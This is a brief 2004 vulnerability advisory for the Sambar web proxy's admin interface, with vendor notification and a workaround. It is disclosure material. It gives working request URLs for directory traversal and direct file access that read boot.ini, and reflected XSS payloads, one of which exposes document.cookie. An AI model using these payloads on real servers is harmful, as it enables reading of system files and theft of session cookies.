Sambar Proxy Multible Vulnerabilities
=====================================

I found some vulnerabilitites in Sambar Webproxy (www.sambar.com), which allow the
sambar admin access to files outside of the application directories.
Since Sambar comes with no password for admin as default, it might be a security problem,
if administration of Sambar proxy is allowed from any IP (by default it is restricted to 127.0.0.1!).

In Addition, i found some XSS.

Directory Traversal
===================

http://myserver/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini

See: www.oliverkarow.de/research/sambar_trav.GIF

Direct File Access
==================

http://localhost/sysadmin/system/showlog.asp?log=c:\boot.ini&tail=y

Cross Site Scripting
====================

http://localhost/sysadmin/system/show.asp?show=<script>alert("oops")</script>

http://localhost/sysadmin/system/showperf.asp?area=search&title=<script>alert(document.cookie)</script>

Version
=======

I only tested Sambar 6.1 Beta 2 on Windows platform (x86). Other versions/platforms may also be affected.

Vendor
======

www.sambar.com

Vendor is informed, and is fixing this vulns in the next release.

Workaround
==========

Set a password for admin account and restrict administration to localhost (default).

Credits
=======

15.05.2004 www.oliverkarow.de

www.oliverkarow.de/research/sambar.txt